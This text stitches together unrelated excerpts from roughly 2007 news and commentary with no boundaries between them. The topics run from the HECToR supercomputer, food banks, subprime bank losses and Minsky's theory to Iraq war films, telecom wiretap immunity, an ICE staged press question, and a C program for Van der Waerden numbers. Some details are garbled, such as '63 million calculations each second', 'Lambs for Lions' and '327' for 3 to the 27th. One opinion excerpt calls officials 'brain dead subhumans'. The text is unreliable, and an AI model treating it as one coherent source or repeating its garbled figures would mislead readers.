The supercomputer HECToR , short for High - End Computing Terascale Resources , is seen in a facility near Edinburgh .
REUTERS / EPSRC / Handout
With the power of 12,000 desktop PCs , the mammoth machine called HECToR is the country ’s fastest computer and one of the most powerful in Europe .
It can make 63 million calculations each second , allowing scientists to conduct research into everything from climate change to new medicines .
The purpose - built machine is housed in 60 wardrobe - sized cabinets in the University of Edinburgh ’s advanced computing centre near the Scottish capital .
After years of development , Chancellor Alistair Darling is due to attend the official launch ceremony for the 113 million pound machine .
“ HECToR will enable us to do research that we simply could not do in any other way , ” said Jane Nicholson , of the Engineering and Physical Sciences Research Council , the public body which acts as the project ’s managing agent .
“ We want to push forward the boundaries of knowledge . ”
Researchers will tap into its power to study ocean currents , build tiny parts for advanced computers and make warplanes less visible to radar .
Other projects include research into superconductors , combustion engines and new materials .
Scientists working in fields ranging from cosmology and atomic physics to disaster simulation and healthcare will also use the computer .
HECToR , which stands for High - End Computing Terascale Resource , was made the U.S. manufacturer Cray Inc .
Despite its vast power , it falls some way short of the world ’s biggest computer : Blue Gene /L .
Housed at the Lawrence Livermore National Laboratory in California , it is used to study nuclear weapons without the need for underground testing .
Susannah Morgan , executive director of the Food Bank of Alaska said , “ The biggest problem is that the federal government ’s programs are dropping as need is growing . ”
Ms. Morgan said the decline has affected rural Alaska , where native tribes run most food pantries .
She said about 10 percent of the state ’s rural food banks have closed because there is not enough federal help coming in .
“ They do n’t feel staffing and heating is worth it for the small amount of food , ” Ms. Morgan said .
Further complicating the picture , Ms. Morgan and others said , is tighter inventory monitoring , which has left many stores with less to donate .
“ They know exactly what they have , down to the can , ” said Darren Hoffman , a spokesman for the Los Angeles Regional Food Bank , whose supplies are down 11 percent this year .
“ They can track a lot better and do n’t order in bulk .
Efficiency has kind of been the enemy of the food bank . ”
Extra food — items that are not selling or seasonal inventory that is no longer needed — is now often sold to low - cost retailers , said Tim Viall , executive director of the Greater Stockton Food Bank in Stockton , Calif .
“ We ’re getting fewer canned goods than last year from retail grocers , because they ’re selling it to warehouse food stores , ” Mr. Viall said .
“ We ’re putting more reliance on canned food drives , and we ’re trying to ramp up the fresh fruit and produce .
We are in the heart of one of the most productive agriculture areas in the world , and we ’re trying to take advantage . ”
In places where community donations are down and there are no food manufacturers to solicit , pantries and food banks are making difficult choices .
The Society of St. Vincent de Paul food pantry in Cincinnati is giving families less food this year because there is not enough .
It has started to ask smaller families to take fewer products .
“ Donations are down , and people who need help is up , ” said Liz Carter , executive director of the food bank .
“ So what are we going to do .
We just made the decision that instead of giving people six or seven days worth of food , we ’re going to give them three or four days of food , which is a drop in the bucket . ”
NEW YORK ( Reuters ) -
The credit crisis deepened on Friday as Wachovia Corp reported a potential $ 1.7 billion loss on mortgage - related debt , while credit card company Capital One Financial Corp said more customers are missing payments .
The Capital One headquarters in McLean , Virginia , August 21 , 2007 .
The U.S. credit crisis deepened on Friday as Wachovia Corp reported a $ 1.1 billion loss on subprime mortgage - related debt in October , while Capital One Financial Corp said more customers are missing payments .
REUTERS / Kevin Lamarque
The news helped cause losses in broader market indexes , on expectations that mounting write - downs and bad loans may plunge the economy into recession .
Shares of financial companies rebounded , but after weeks of heavy selling on worries about the impact of the credit downturn on their bottom lines .
Bank of America Corp and JPMorgan Chase & Co , the second - and third - largest U.S. banks , said the poor market conditions could hurt fourth - quarter results .
After markets closed , online brokerage E*Trade Financial Corp withdrew its forecast for 2007 profit of 75 cents to 90 cents per share , citing expected write - downs in its fixed - income holdings .
Its shares fell more than 11 percent .
“ This is now worse than Long - Term Capital ( Management ) , ” said Jack Malvey , chief global fixed - income strategist at Lehman Brothers Inc , referring to the hedge fund whose 1998 collapse threatened to unhinge global financial markets .
“ This is a painful lesson in financial engineering . ”
Wachovia , the fourth - largest U.S. bank , said the value of its so - called asset - backed collateralized debt obligations ( CDOs ) linked to subprime mortgages fell about $ 1.1 billion in October , to $ 676 million from $ 1.8 billion .
The pre-tax loss is in addition to a $ 347 million third - quarter loss , it said .
Charlotte , North Carolina - based Wachovia also expects to boost loan losses by $ 500 million to $ 600 million this quarter , largely because of “ dramatic declines ” in housing values .
Wachovia joined Citigroup Inc , Merrill Lynch & Co , Morgan Stanley and other financial companies to report tens of billions of dollars of subprime losses .
“ WE ARE NOT IMMUNE ”
Wachovia Chief Risk Officer Don Truslow said at a banking conference in Boston that credit problems in housing were concentrated in “ several pockets ” in California and Florida .
“ The housing market certainly has been deteriorating very , very quickly in certain parts of the country , ” he said .
“ We are not immune . ”
Wachovia paid $ 24.2 billion in October 2006 for Golden West Financial Corp , a California adjustable - rate mortgage lender .
“ It now becomes even more obvious that Wachovia purchased the thrift at the wrong time of the cycle , ” Deutsche Bank Securities analyst Mike Mayo wrote .
Gary Townsend , a Friedman , Billings , Ramsey & Co analyst , downgraded Wachovia to “ underperform ” from “ market perform . ”
“ Subprime is a huge issue , and it ’s going to get worse , ” said Ted Parrish , who helps invest $ 1.3 billion at Henssler Asset Management in Kennesaw , Georgia .
“ My uncertainty is over how long it will take lenders to recover from write - offs . ”
Credit analysts at Citigroup estimated $ 64 billion of industry losses from asset - backed CDOs .
Britain ’s Barclays Plc on Friday rejected rumors it might lose $ 10 billion .
Separately , Wachovia said it would reduce reported third - quarter profit by $ 72 million , or 4 cents per share , to reflect its share of Visa Inc ’s $ 2.1 billion antitrust settlement with American Express Co on Wednesday .
CAPITAL ONE CARD LOSSES
Capital One , the largest independent MasterCard and Visa credit card issuer , said its net charge - off rate rose to 3.28 percent in October from the third quarter ’s 2.86 percent .
The charge - off rate in U.S. cards rose to 5.11 percent from 4.13 percent in the same periods , while card loans at least 30 days past due rose to 4.75 percent from 4.46 percent .
Capital One had on Tuesday raised its forecast for 2008 credit losses .
“ While management previously indicated that the U.S. card loss rate would trend north of 5 percent in the fourth quarter , we were surprised to see how fast this jumped , ” Credit Suisse analyst Moshe Orenbuch wrote .
Standard & Poor ’s revised its rating outlook for McLean , Virginia - based Capital One to “ stable ” from “ positive . ”
Bank of America , also based in Charlotte , said market dislocations , including those affecting CDOs , will “ adversely impact ” fourth - quarter results .
New York - based JPMorgan , meanwhile , said it may need further write - downs this quarter , given its exposure to about $ 50 billion of leveraged loans , subprime mortgages and CDOs .
Lehman ’s Malvey said : “ We will find out over the next three to six quarters if we are coming close to recession or may cross over the recession line . ”
On Friday , Wachovia shares rose 35 cents to $ 40.65 ; Capital One rose $ 1.36 to $ 54.26 ; and Bank of America rose 48 cents to $ 43.98 .
JPMorgan fell 30 cents to $ 42.31 .
The respective stocks are down 29 percent , 29 percent , 18 percent and 12 percent this year .
E*Trade , after closing 1 cent lower at $ 8.59 , fell to $ 7.60 after - hours .
At the close , it was down 62 percent this year .
Opinion
Bush 's Arrogance in the Face of Global Warming
Everyone now seems to be waking up to what we and other people have been saying for four years .
What they are NOT doing , is going far enough .
Once again the following must be totally SCRAPPED in order to protect the privacy of the British Public :
The NIR – the National Identity Register that backs the ID Card .
Mass Fingerprinting – Compulsory fingerprinting for access to anything must be outlawed .
The NHS ‘ Spine ’ – The NHS SPine must be scrapped , as it suffers from the same vulnerabilities as all centralized databases do .
ContactPoint –
The database of all children in the UK must be scrapped , as it is no different to any of the other databases listed above .
Project Semaphore –
The plan to collect 53 pieces of data on all travellers flying to the UK ( a mirror project of USVISIT ) must be stopped .
USVISIT has cost the american people BILLIONS of dollars and only 1500 people have been caught , millions have been subjected to humiliation and violation and none of the people caught have been identified as ‘ terrorists ’ .
No one in the UK has done a cost benefit analasis of Project Semaphore and USVISIT ; had they done so , they would have found that it is a total waste of money .
All of these projects MUST BE ABANDONED and the contracts terminated , even if there are penalties to be paid .
It ’s good news to hear that people are FINALLY waking up , and I know that we have done our own small part in getting the word out about what a disaster this is in the making .
Now lets FINISH THE JOB .
No signing up for ID cards , demand that your doctor remove your records from his system , and NEVER give your fingerprint to anyone for ANY reason .
This rabid mania for ‘ registers ’ should now be put out of the minds of the brain dead subhumans who run the government , PERMANENTLY .
Who would have thought that four .25 p DVDRs could bring down billion pound contracts and a fascist police state control system ?!
The fact of the matter is that these corrupt regimes and their infernal tools are as weak as spiders webs .
All it takes is one touch and the whole thing can be brought down .
In this case , the biometric net is the weak premise being destroyed .
“ What were they smoking ? ” asks the cover of the current issue of Fortune magazine .
Underneath the headline are photos of recently deposed Wall Street titans , captioned with the staggering sums they managed to lose .
The answer , of course , is that they were high on the usual drug — greed .
And they were encouraged to make socially destructive decisions by a system of executive compensation that should have been reformed after the Enron and WorldCom scandals , but was n’t .
In a direct sense , the carnage on Wall Street is all about the great housing slump .
This slump was both predictable and predicted .
“ These days , ” I wrote in August 2005 , “ Americans make a living selling each other houses , paid for with money borrowed from the Chinese .
Somehow , that does n’t seem like a sustainable lifestyle . ”
It was n’t .
But even as the danger signs multiplied , Wall Street piled into bonds backed by dubious home mortgages .
Most of the bad investments now shaking the financial world seem to have been made in the final frenzy of the housing bubble , or even after the bubble began to deflate .
Twenty - five years ago , when most economists were extolling the virtues of financial deregulation and innovation , a maverick named Hyman P. Minsky maintained a more negative view of Wall Street ; in fact , he noted that bankers , traders , and other financiers periodically played the role of arsonists , setting the entire economy ablaze .
Wall Street encouraged businesses and individuals to take on too much risk , he believed , generating ruinous boom - and - bust cycles .
The only way to break this pattern was for the government to step in and regulate the moneymen .
TOM BACHTELL
Many of Minsky ’s colleagues regarded his “ financial - instability hypothesis , ” which he first developed in the nineteen - sixties , as radical , if not crackpot .
Today , with the subprime crisis seemingly on the verge of metamorphosing into a recession , references to it have become commonplace on financial Web sites and in the reports of Wall Street analysts .
Minsky ’s hypothesis is well worth revisiting .
In trying to revive the economy , President Bush and the House have already agreed on the outlines of a “ stimulus package , ” but the first stage in curing any malady is making a correct diagnosis .
Minsky , who died in 1996 , at the age of seventy - seven , earned a Ph.D. from Harvard and taught at Brown , Berkeley , and Washington University .
He did n’t have anything against financial institutions — for many years , he served as a director of the Mark Twain Bank , in St. Louis — but he knew more about how they worked than most deskbound economists .
There are basically five stages in Minsky ’s model of the credit cycle : displacement , boom , euphoria , profit taking , and panic .
A displacement occurs when investors get excited about something — an invention , such as the Internet , or a war , or an abrupt change of economic policy .
The current cycle began in 2003 , with the Fed chief Alan Greenspan ’s decision to reduce short - term interest rates to one per cent , and an unexpected influx of foreign money , particularly Chinese money , into U.S. Treasury bonds .
With the cost of borrowing — mortgage rates , in particular — at historic lows , a speculative real - estate boom quickly developed that was much bigger , in terms of over - all valuation , than the previous bubble in technology stocks .
As a boom leads to euphoria , Minsky said , banks and other commercial lenders extend credit to ever more dubious borrowers , often creating new financial instruments to do the job .
During the nineteen - eighties , junk bonds played that role .
More recently , it was the securitization of mortgages , which enabled banks to provide home loans without worrying if they would ever be repaid .
( Investors who bought the newfangled securities would be left to deal with any defaults . )
Then , at the top of the market ( in this case , mid-2006 ) , some smart traders start to cash in their profits .
The onset of panic is usually heralded by a dramatic effect : in July , two Bear Stearns hedge funds that had invested heavily in mortgage securities collapsed .
Six months and four interest - rate cuts later , Ben Bernanke and his colleagues at the Fed are struggling to contain the bust .
Despite last week ’s rebound , the outlook remains grim .
According to Dean Baker , the co-director of the Center for Economic and Policy Research , average house prices are falling nationwide at an annual rate of more than ten per cent , something not seen since before the Second World War .
This means that American households are getting poorer at a rate of more than two trillion dollars a year .
It ’s hard to say exactly how falling house prices will affect the economy , but recent computer simulations carried out by Frederic Mishkin , a governor at the Fed , suggest that , for every dollar the typical American family ’s housing wealth drops in a year , that family may cut its spending by up to seven cents .
Nationwide , that adds up to roughly a hundred and fifty - five billion dollars , which is bigger than President Bush ’s stimulus package .
And it does n’t take into account plunging stock prices , collapsing confidence , and the belated imposition of tighter lending practices — all of which will further restrict economic activity .
In an election year , politicians ca n’t be expected to acknowledge their powerlessness .
Nonetheless , it was disheartening to see the Republicans exploiting the current crisis to try to make the President ’s tax cuts permanent , and the Democrats attempting to pin the economic downturn on the White House .
For once , Bush is not to blame .
His tax cuts were irresponsible and callously regressive , but they did n’t play a significant role in the housing bubble .
If anybody is at fault it is Greenspan , who kept interest rates too low for too long and ignored warnings , some from his own colleagues , about what was happening in the mortgage market .
But he was n’t the only one .
Between 2003 and 2007 , most Americans did n’t want to hear about the downside of funds that invest in mortgage - backed securities , or of mortgages that allow lenders to make monthly payments so low that their loan balances sometimes increase .
They were busy wondering how much their neighbors had made selling their apartment , scouting real - estate Web sites and going to open houses , and calling up Washington Mutual or Countrywide to see if they could get another home - equity loan .
That ’s the nature of speculative manias : eventually , they draw in almost all of us .
You might think that the best solution is to prevent manias from developing at all , but that requires vigilance .
Since the nineteen - eighties , Congress and the executive branch have been conspiring to weaken federal supervision of Wall Street .
Perhaps the most fateful step came when , during the Clinton Administration , Greenspan and Robert Rubin , then the Treasury Secretary , championed the abolition of the Glass - Steagall Act of 1933 , which was meant to prevent a recurrence of the rampant speculation that preceded the Depression .
The greatest need is for intellectual reappraisal , and a good place to begin is with a statement from a paper co-authored by Minsky that “ apt intervention and institutional structures are necessary for market economies to be successful . ”
Rather than waging old debates about tax cuts versus spending increases , policymakers ought to be discussing how to reform the financial system so that it serves the rest of the economy , instead of feeding off it and destabilizing it .
Among the problems at hand : how to restructure Wall Street remuneration packages that encourage excessive risk - taking ; restrict irresponsible lending without shutting out creditworthy borrowers ; help victims of predatory practices without bailing out irresponsible lenders ; and hold ratings agencies accountable for their assessments .
These are complex issues , with few easy solutions , but that ’s what makes them interesting .
As Minsky believed , “ Economies evolve , and so , too , must economic policy . ” ♦
Americans may be divided on many subjects but they seem to agree on one thing : they will not buy tickets to see this year 's crop of war films .
Rarely have film critics and moviegoers , conservatives and liberals , been in such agreement - the big - screen lecturing that underscores Hollywood 's approach to Iraq war - related films has rendered this crop of multimillion - dollar movies with top - star casts a critical and financial flop .
Oscar - winning director Paul Haggis's
In the Valley of Elah , about a father investigating the death of his son in Iraq , has taken just $ 6.5 m in two months ; the political drama Lambs for Lions starring Tom Cruise and Meryl Streep , and directed by Robert Redford , has been called ' the most inert , predictable and unnecessary political film this year ' ; Rendition , starring Reese Witherspoon and Jake Gyllenhaal , a $ 50 m thriller , has taken less than $ 10 m since it was released in October .
Even films that are not war - themed but touch on Middle East issues have suffered .
The Kingdom , starring Jamie Foxx and Jennifer Garner , about an FBI squad targeting Saudi terrorists , has made less than $ 7 million .
Prospects for Brian De Palma 's Redacted , on general release in the US this weekend , look similarly dire .
Critic Michael Medved said ' it could be the worst movie I 've ever seen ' , but Bill O'Reilly , the Fox News pundit , went much further by urging filmgoers to boycott it .
He called it ' vile ' and warned that it could get American troops killed .
Filmgoers have delivered their own verdict : on limited release to 15 cities last weekend , Redacted took $ 25,000 at the box office .
The story about the rape and murder of an Iraqi girl by US troops appeals neither to conservatives nor to liberals , who say it is bad movie but good propaganda .
The failure of this era's war films is a blow to Hollywood 's confidence , especially given the industry 's broad opposition to the war .
Liberal orthodoxy holds that Americans are so sick of the war they cannot bring themselves to watch films about it - Steven Bochco , who produced a short - lived TV series Over
There about a platoon in Iraq , says it is hard to win audiences to the subject of a ' hugely unpopular war ' .
Conservatives typically say that it 's simply a bad idea to lecture people , or to demoralise the war effort at a time when young Americans are returning home wounded or in coffins .
In previous conflicts in which the morality of the enterprise was less confused , Hollywood displayed a more even grasp of the subject .
Whether it was Top Gun in the closing years of the Cold War , or Apocalypse Now , Coming Home and The Deer Hunter in the aftermath of Vietnam , audiences and critics embraced both the depiction and sentiment .
Audiences also knew less about the politics of the actors .
But this time audiences also seem to be reacting against the lazy uniformity of Hollywood liberalism .
As New York Times critic Manohla Dargis noted in her review of Lions for Lambs , the assertion that you can support the troops even if you do n't support the war is n't the problem .
' The problem is the film reflexively embraces it , much as it does every single other cliche , without inquiry , challenge or a single ounce of real risk . '
Still , the failure of these films gives pleasure to right - wing pundits .
' I 'm glad Hollywood is taking a bath on its anti-war tsunami of movies , ' says Fox critic John Gibson .
' Maybe Hollywood will learn again that audiences want to be entertained , and they will go elsewhere for lectures . '
Audiences have voted convincingly that they do not want the war in Iraq depicted at all - or at least not yet .
As Variety editor Peter Bart recently noted in one of his columns : ' I applaud filmmakers for dealing with real issues in the real world .
At the same time the feel - bad genre ( which is only in its early stages ) is becoming downright oppressive .
Filmgoers have a right to ask :
When are we going to get some comic relief ? '
But there is one war film left to come this season that looks likely to be a crowd pleaser .
Charlie Wilson's
War is primed for Oscar nominations and stars Tom Hanks as a Democratic Texas congressman who conspires to supply anti-aircraft missiles to the Mujahideen during the Soviet invasion of Afghanistan in the 1980s .
It has all the ingredients for a hit - Hanks as a womanising alcoholic and hero ; Julia Roberts , as one of the wealthiest women in Texas , Charlie 's lover and avid anti-communist .
Unlike the current crop of films about Iraq , it is a reminder of the nation 's last clear strategic and moral victory : the defeat of communism .
America as hero is uncomplicated , fun - and good for the box office .
· To buy tickets for a preview of In the Valley of Elah and the Guardian Interview with Paul Haggis ( Tuesday 4 December at BFI Southbank , 6.30 pm ) click here .
Download Download ( h/t Heather )
Yesterday 's Worst Person in the World honors should have come as no surprise to anyone reading the site yesterday .
The gold went to movie review - cum - slavery apologist Michael Medved and the silver to Col.
David Hunt for his op - ed chastising generals for " betraying the troops " .
But the bronze prize takes the cake in its sheer audacity .
White House Spokesliar Dana Perino , when asked for a statement on the situation in Burma , had this to say :
Well , unfortunately , intimidation and force can chill peaceful demonstrations .
And reports about very innocent people being thrown into detention , where they could be held for years without any representation or charges , is distressing ; and we understand that some of the monasteries have been sealed .
Now , obviously , this has , again , a chilling effect on protestors , but we would ask that everyone show restraint and allow those who want to express themselves to be able to do so in Burma .
As Keith points out , those distressing concepts are apparently perfectly okay if you 're a Bushie ( an offshoot of the axiom IOKIYAR ) :
You got a map ?
You know where Florida is ?
Go to the right .
Lower .
Lower .
Bottom of that long , thin island right there .
Read what it says .
Right , Guantanamo Bay .
Now go look up reports about very innocent people being thrown into detention where they could be held for years without any representation or charges .
By your bosses .
At Guantanamo Bay .
Oh snap .
AT first glance , Crocs and Coach might not appear to have much in common .
One is known for its plastic clogs that , while comfortable , will never be beloved by the arbiters of style .
The other is famous for deluxe leather handbags that command both high prices and respect from tony consumers .
But when it comes to their shares , Crocs and Coach have been treading a similar path in recent weeks , with both falling sharply after disappointing Wall Street when they announced their latest earnings .
The trajectory of Crocs has been especially sharp , plunging 50 percent since the end of October after more than tripling this year .
That ’s not the only similarity ; in both cases , the drop was preceded by heavy selling among corporate officers and directors , including top executives .
At Crocs , insiders dumped more than $ 176 million worth of their shares this year while Coach officers sold $ 57.2 million .
The last sale by Keith D. Monda , Coach ’s president and chief operating officer , took place Sept. 19 , when he unloaded 50,000 shares at $ 50.64 , netting $ 2.5 million .
Within weeks , as worries mounted about the entire retail sector , Coach warned that it was “ concerned with recent traffic trends in our North American retail stores , ” and analysts cut their earnings estimates .
By last week , Coach shares were trading at $ 32.58 .
Heavy selling by insiders before a stock swoons does n’t necessarily mean they knew something before the rest of us found out the hard way — after all , selling ( or buying ) based on nonpublic information is illegal .
Coach says the sales were part of routine dispositions by corporate officers who naturally want to diversify their holdings .
A spokeswoman for Crocs declined to comment for this article .
Despite a boost from Barack Obama — but not the absent Hillary Clinton — Democratic senators today failed to stop the Bush administration from winning legal immunity for telecom companies that helped the government eavesdrop on Americans .
Obama voted with 30 fellow Democrats to allow the telecom companies to face lawsuits , which civil liberties groups consider a crucial chance to unearth information on the administration 's programme of wiretapping without a court warrant .
But the immunity survived , with 18 Democrats crossing over to support George Bush .
Clinton missed the vote on a day of intense last minute campaigning as Virginia , Maryland , and the capital all held presidential primaries .
Whether her absence will spark criticism from liberal Democrats , who have made the fight against so - called " telecom immunity " a high priority , remains to be seen .
The next challenge for Democrats is reconciling the Senate 's wiretap bill , slated for final approval today , with a version backed by the House of Representatives that contains no telecom immunity and stronger protections for US citizens who could be caught in the surveillance net .
" Holding all the Democrats together on this , we 've learned a long time ago , is not something that 's doable , " the party 's Senate leader , Harry Reid , told reporters today .
The current authorisation for administration wiretapping without warrants expires on Friday , and Democrats are pursuing a temporary extension to allow more time for negotiations .
But George Bush , appearing confident that Republicans have the upper hand in the debate , has hinted he would veto such a move .
Opponents of telecom immunity already are prodding Democratic leaders to adopt the House 's approach , effectively daring Bush to kill the wiretap bill that his own administration requested .
" The Senate has buckled , " Democratic senator Russ Feingold said .
" We are left with a very dangerous piece of legislation . "
Kevin Bankston , a senior attorney at the non-profit Electronic Frontier Foundation ( EFF ) , appealed directly to House Democratic leader Nancy Pelosi .
" It 's time for Speaker Pelosi to draw a line the sand and make clear to the president that this House of Representatives is never going to pass any bill that includes immunity for lawbreaking telecoms , " Bankston said in a statement .
The EFF is representing a group of Americans who are suing AT&T in a California federal court , alleging mass interception of their private communications without a warrant .
Granting immunity to AT&T would almost certainly halt that lawsuit .
Other attempts to strengthen the wiretap bill 's protections for US citizens also fell short today , but the telecom immunity vote was the most closely watched .
Obama made the most of his time on Capitol Hill , chatting up undecided senators whose votes at this summer 's Democratic convention could help him defeat Clinton .
" There 's no replacement for either of our presidential aspirants to be on the floor , talking to members , " Democratic senator Dick Durbin , a close Obama confidante , said .
" Senator Obama had the chance to talk to quite a few . "
But many of Obama 's colleagues had their own political futures to worry about .
Eight of the Democrats who voted to shield the telecom companies hail from Republican - leaning states , including several facing strong re-election challenges next year .
Republicans are using the possibility of a future terrorist strike on the US as a cudgel in the wiretapping debate , accusing Democrats of wanting to give terrorists the same legal rights as American citizens .
In fact , Democratic senator Ron Wyden added extra protections for Americans to the wiretap bill , requiring a court warrant for surveillance of US citizens while they are overseas .
" The reason that the immunity issue is such a flashpoint is that the administration said for years and years , ' The [ wiretapping ] programme is legal ' , " Wyden said .
" Then , after lawsuits were filed , they come back and say , ' Even though we told you the programme was legal , we need immunity ' .
It 's very hard to square those two arguments . "
Democrats are conscious that a White House - backed wiretap bill they passed in August alienated liberal voters and caused consternation within their ranks .
They appear more prepared this month to counter what they characterise as deliberate misrepresentations by Bush and Republicans .
" This is fear - mongering , it is wrong , and it has obscured what is really going on here , " Feingold said yesterday .
John McCain , the Republicans ' likely presidential nominee , also cast votes today in the Senate , siding with his party to preserve telecom immunity and pass Bush 's preferred bill .
A RECENT story that did n't get nearly the attention it deserved was the New York Daily News report that 46,000 registered New York City voters are also registered to vote in Florida .
Nearly 1,700 of them have had absentee ballots mailed to their home in the other state , and as many as 1,000 have voted twice in the same election .
... ( Full Article : 835 Words )
This article is available in our archives : Globe Subscribers FREE for subscribers Subscribers to the Boston Globe get unlimited access to our archives .
Not a subscriber ?
Non-Subscribers Purchase an electronic copy of the full article .
Learn More $ 4.95 1 Article
1 Article $ 9.95 4 Articles
4 Articles $ 99.95 Unlimited
Embattled immigration chief went to fake questioner at first press conference Nick Juliano
Published : Tuesday November 27 , 2007
del.icio.us
Print This Email
This ICE head already facing criticism for praising offensive Halloween costume A top immigration official , who has been criticized for her youth , inexperience and poor judgment , took a question from a government employee posing as a reporter during her very first press conference last year , RAW STORY has learned .
Immigration and Customs Enforcement chief Julie Myers called on an agency spokeswoman who was standing with about a dozen other reporters during a February 2006 press conference in San Antonio .
Critics had criticized Myers as an unfit nominee because of her lack of immigration experience and close ties to the Bush administration .
Her performance at that first press conference was panned when she " struggle [d ] to pronounce Nuevo Laredo , " a Mexican border town that is a hot spot of criminal activity and drug trafficking into the US .
The ICE employee was told not to ask any questions , and she was verbally reprimanded after doing so , according to a letter delivered last week to the House Committee on Homeland Security .
Committee chairman Bennie Thompson requested the Department of Homeland Security review its press-relations protocols after the Federal Emergency Management Agency was found to have staged a fake press conference in October to respond to raging California wildfires , causing the press conference 's organizer to lose a promotion .
" [ T ] he intent of staff involved in each instance was different , but both episodes were foolish and completely unacceptable , " J. Edward Fox , DHS assistant secretary for public affairs , wrote to Thompson .
" Nothing can be more important than credibility and integrity when communicating with the public . "
Fox 's letter said the San Antonio press conference happened in January 2006 , although the San Antonio Express News reported Myers ' first press conference after garnering a controversial recess appointment as a DHS assistant secretary was not until Feb.
3 , 2006 .
DHS spokesman Russ Knocke , who discovered the fake question in a review of department press conferences , told RAW STORY that he was unable to determine the precise date of the press conference , which some employees remembered as happening in late January while others remembered the date as early February .
Furthermore , he said his investigation did not reveal exactly what question was asked .
" There 's some fog , " Knocke said in a phone interview Monday .
" Most folks who were present do not recollect exactly what the question was . "
The immigration spokeswoman , who Knocke refused to name " because of obvious HR restrictions , " asked Myers a general question about her feelings on ICE 's relationships with other law enforcement agencies , he said based on general characterizations of the question .
No transcript of the event exists in DHS or ICE records , Knocke said , although some employees he spoke to gave general characterizations of the question .
According to Fox 's letter , the spokeswoman told her supervisor that she wanted to ask Myers a question and ignored her boss 's admonition not to question Myers .
In " short order " after the press conference , the spokeswoman was verbally reprimanded by her immediate supervisor and a public affairs official at ICE headquarters in Washington , Knocke said .
Myers called on the staff member by name " for purposes of concluding the press conference , " after she had answered several reporters ' questions , Knocke said .
After responding to the staffer , Myers continued to take several more questions from reporters .
The ICE spokeswoman was " well known amongst San Antonio media , " Fox wrote , and Knocke said she worked as a reporter in the area before joining the immigration agency .
Reporters covering the press conference , which focused on an earlier immigration bust that netted $ 1 million in cash , drugs and heavy weapons , apparently did not mention that the spokeswoman was among the questioners .
Attempts to reach reporters for further comment were unsuccessful Monday .
Since last month 's revelations of the fake FEMA press conference , the agency has started to implement new protocols for handling press events that would prohibit government employees from asking questions alongside journalists , Fox wrote .
A similar plan is expected to be enacted across DHS offices nationwide .
Sen. Hillary Clinton ( D - NY ) also came under fire recently when her campaign admitted planting a friendly question with an audience member during a recent town hall forum .
It is unclear how many questions Myers took from real journalists to balance the soft - ball lobbed from her employee .
The just - appointed assistant secretary had faced harsh criticism from conservative commentators and lawmakers who said she lacked the law enforcement and management experience to oversee ICE , which has 15,000 workers and a $ 4 billion budget .
President Bush elevated Myers to the position with a controversial " recess appointment " that subverted the Senate 's ability to confirm the nominee .
Critics say Myers ' ascension to the top spot at ICE was another example of Bush 's " cronyism " because she is married to a US Attorney who formerly served as chief of staff DHS Secretary Michael Chertoff and her uncle is Gen.
Richard Myers , the former chairman of the Joint Chiefs of Staff .
" This nomination is a monumental political and policy blunder in the wake of the Michael Brown / FEMA fiasco , " wrote conservative blogger Michelle Malkin , a fierce critic of the administration 's immigration policies , before Myers took on her new job .
" And I can tell you ... rank - and - file DHS employees and immigration enforcement officials are absolutely livid about Myers ' nomination . "
More recently , Myers was forced to apologize after an ICE employee showed up at a costume party in what many thought was a racist costume and she was on a panel that judged the costume " most original . "
Sen. Claire McCaskill ( D - MO ) , who sits on the Senate Homeland Security Committee , has placed a temporary hold on Myers ' nomination because of her failure to condemn the costumed employee , who reportedly showed up at the party wearing dark makeup , dreadlocks and prison stripes .
Senate Majority Leader Harry Reid has not scheduled a floor vote on the nominee , but Myers has the support of several key Senators and a McCaskill spokeswoman has said she does not intend to hold up the vote indefinitely .
A McCaskill spokeswoman did not immediately return a call seeking comment Tuesday .
Myers ' recess appointment expires in January , and even some Republicans doubt whether she could or should be confirmed .
" The way things are going , we may not ever vote on her nomination , " Sen .
Kit Bond , R - Mo. , who is a second cousin of Myers ' husband , told the Associated Press earlier this month .
" Our nation 's immigration enforcement agency needs non-controversial leadership .
That would be best served by going in a different direction with this nomination . "
The Coop , Harvard 's Barnes - and - Noble - run bookstore , has begun to throw out students who " take a lot of notes " about book pricing , stating that their prices are " intellectual property . "
Apparently , no one with a Harvard Law degree is involved in formulating this notion , as factual matters ( such as pricing ) are not copyrightable .
Coop President Jerry P. Murphy ' 73 said that while there is no Coop policy against individual students copying down book information , " we discourage people who are taking down a lot of notes . "
The apparent new policy could be a response to efforts by Crimsonreading .
org–an online database that allows students to find the books they need for each course at discounted prices from several online booksellers –from writing down the ISBN identification numbers for books at the Coop and then using that information for their Web site .
Murphy said the Coop considers that information the Coop 's intellectual property .
Van der Waerden 's problem : program 1
In this series of articles I 'm going to analyze four versions of a program that I wrote around 1988 , and then another program that does the same thing that I wrote last month without referring to the 1988 code .
If you do n't remember what the program does , here 's an explanation .
Program 1
I 'm going to discuss the program a bit at a time .
The complete program is here .
This program does an unpruned exhaustive search of the string space .
Since for V ( 3 , 3 ) the string space contains 327 = 7,625,597,484,987 strings , it takes a pretty long time to finish .
I quickly realized that I was wasting my time with this program .
The program is invoked with a length argument and an optional colors argument , which defaults to 2 .
It then looks for good strings of the specified length , printing those it finds .
If there are none , one then knows that V ( 3 , colors ) > length .
Otherwise , one knows that V ( 3 , colors ) ≤ length , and has witness strings to prove it .
I do n't want to spend a lot of time on it because there are plenty of C programming style guides you can read if you care for that .
But already on lines 4 – 5 we have something I would n't write today : # define NO 0 # define YES !NO
Oh well .
The program wants to iterate through all Cn strings .
How does it know when it 's done ?
It 's not easy to make a program as slow as this one even slower , but I found a way to do it .
last = STRING ( length ) ; stuff ( last , 'A ' - 1 + colors ) ; for ( i=0 ; i<colors ; i++) last [ i ] = ' A ' + i ; for ( ; strcmp ( seq , last ) ; strinc ( seq ) ) ...
It manufactures the string ABCDDDDDDDDD ....D and compares the current string to that one every time through the loop .
A much simpler method is to detect completion while incrementing the target string .
The function that does the increment looks like this : void strinc (s ) char *s ; { int i ; for ( i= length - 1 ; i>=0 ; i--) { if ( s [ i ] != ' A ' - 1 + colors ) { s[ i ]++ ; return ; } s[i ] = ' A ' ; } return ; } Had I been writing it today , it would have looked more like this : unsigned strinc ( char * s ) { char *p = strchr(s , ' \0 ' ) - 1 ; while ( p >= s && *p == ' A ' + colors - 1 ) *p-- = ' A ' ; if ( p < s ) return 0 ; ( * p ) ++ ; return 1 ; } ( This code is in a pink box to show that it is not actually part of the program I am discussing in this article . )
The function returns true on success and false on failure .
A false return can be taken by the caller as the signal to terminate the program .
This replacement function invokes undefined behavior , because there is no guarantee that p is allowed to run off the beginning of the string in the way that it does .
But there is no need to check the strings in lexicographic order .
